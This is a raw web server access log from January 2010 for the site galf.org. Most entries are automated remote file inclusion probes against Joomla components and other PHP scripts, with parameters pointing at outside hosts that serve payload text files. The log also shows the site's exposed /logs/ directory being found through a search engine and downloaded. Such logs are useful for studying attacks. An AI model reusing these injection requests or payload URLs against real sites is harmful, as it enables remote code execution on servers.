67.195.37.161 - - [04/Jan/2010:02:46:43 -0800] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:47:10 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:47:10 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:47:10 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:48:34 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:54:18 -0800] "GET /modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:54:18 -0800] "GET /logs/access_091123.log%20%20/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:54:18 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:54:19 -0800] "GET /modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:54:19 -0800] "GET /logs/access_091123.log%20%20/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:54:19 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:55:03 -0800] "GET /logs/access_090601.log%20%20/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:55:05 -0800] "GET /logs/access_090601.log%20%20/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:56:58 -0800] "GET /logs//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:56:58 -0800] "GET /logs/access_090914.log//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:56:58 -0800] "GET /components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:07 -0800] "GET /components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:07 -0800] "GET /logs//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:07 -0800] "GET /logs/access_090914.log%20%20//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:20 -0800] "GET /components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:20 -0800] "GET /logs//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:20 -0800] "GET /logs/access_090914.log//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.139.156.235 - - [04/Jan/2010:02:57:46 -0800] "GET /logs/ HTTP/1.0" 200 4926 "http://www.google.co.id/url?sa=t&source=web&ct=res&cd=1&ved=0CAoQFjAA&url=http%3A%2F%2Fwww.galf.org%2Flogs%2F&rct=j&q=Index+of+%2Flogs&ei=nMlBS-_jMI3i7AOTrdnXBQ&usg=AFQjCNHxPdRWtvkkSW5L74xwOZb_30Yffg" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.galf.org"
110.139.156.235 - - [04/Jan/2010:02:57:48 -0800] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.galf.org"
110.139.156.235 - - [04/Jan/2010:02:57:53 -0800] "GET /logs/access.log HTTP/1.0" 200 304278 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:57 -0800] "GET /logs/access_090914.log//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:57 -0800] "GET /components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:57:57 -0800] "GET /logs//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.139.156.235 - - [04/Jan/2010:02:58:46 -0800] "GET /logs/access_090803.log HTTP/1.0" 200 1572864 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:03:00:24 -0800] "GET /components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:03:00:24 -0800] "GET /logs/access_090914.log//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:03:00:24 -0800] "GET /logs//components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:01:25 -0800] "GET /logs/access_091123.log/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:01:40 -0800] "GET /logs/access_090601.log/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:02:29 -0800] "GET /logs/access_091123.log/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:02:42 -0800] "GET /logs/access_090601.log/modules/My_eGallery/index.php?basepath=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [04/Jan/2010:03:05:53 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [04/Jan/2010:03:05:53 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [04/Jan/2010:03:05:53 -0800] "GET /logs/access_091228.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [04/Jan/2010:03:06:59 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [04/Jan/2010:03:07:06 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [04/Jan/2010:03:07:08 -0800] "GET /logs/access_091228.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.182 - - [04/Jan/2010:03:07:36 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
207.46.199.182 - - [04/Jan/2010:03:12:52 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
90.176.234.205 - - [04/Jan/2010:03:12:54 -0800] "GET /logs/access_091228.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.138 - - [04/Jan/2010:03:13:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
90.176.234.205 - - [04/Jan/2010:03:15:42 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.176.234.205 - - [04/Jan/2010:03:15:44 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
90.176.234.205 - - [04/Jan/2010:03:15:44 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.reveriesoft.com/phpcow/gallery/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:21:45 -0800] "GET /inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:23:08 -0800] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:23:08 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:23:08 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:24:07 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:24:07 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:27:07 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:27:07 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:27:07 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:27:07 -0800] "GET /logs/access_091228.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:27:08 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:27:08 -0800] "GET /logs/access_091228.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:28:10 -0800] "GET /inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:28:10 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:28:10 -0800] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:28:14 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [04/Jan/2010:03:31:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [04/Jan/2010:03:31:27 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [04/Jan/2010:03:31:27 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:32:24 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:32:24 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:38:47 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:38:47 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:38:47 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:38:53 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:38:53 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:38:53 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.46.199.189 - - [04/Jan/2010:03:39:19 -0800] "GET /cendoc.php HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.62.35.55 - - [04/Jan/2010:03:40:26 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:40:27 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:40:27 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:40:44 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:40:44 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [04/Jan/2010:03:40:44 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.58.130 - - [04/Jan/2010:03:41:11 -0800] "GET /logs/access.log%20%20//toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:03:41:11 -0800] "GET /toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:03:41:11 -0800] "GET /logs//toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:03:41:14 -0800] "GET /toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:03:41:14 -0800] "GET /logs/access.log%20%20//toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.58.130 - - [04/Jan/2010:03:41:14 -0800] "GET /logs//toolbar.php?dirDepth=http://www.ottoebeyer.com/tools/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.80.239.28 - - [04/Jan/2010:03:43:22 -0800] "GET /logs/access_090608.log HTTP/1.1" 404 - "http://megaworld.my1.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:37 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:37 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:37 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:43 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:43 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:43 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:43 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:43 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:03:47:43 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
163.152.219.201 - - [04/Jan/2010:03:47:49 -0800] "GET /logs/access_090713.log%20%20////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:03:47:50 -0800] "GET /logs////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 200 4965 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:10 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:10 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:10 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:14 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:14 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:14 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:15 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:15 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:03:48:15 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:03:48:37 -0800] "GET /logs/access.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:48:37 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:03:48:37 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.24.131.38 - - [04/Jan/2010:03:49:22 -0800] "GET /logs/access.log//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [04/Jan/2010:03:49:22 -0800] "GET /errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [04/Jan/2010:03:49:22 -0800] "GET /logs//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
72.55.146.200 - - [04/Jan/2010:03:49:31 -0800] "GET /logs/access_090817.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:03:49:31 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:03:49:31 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
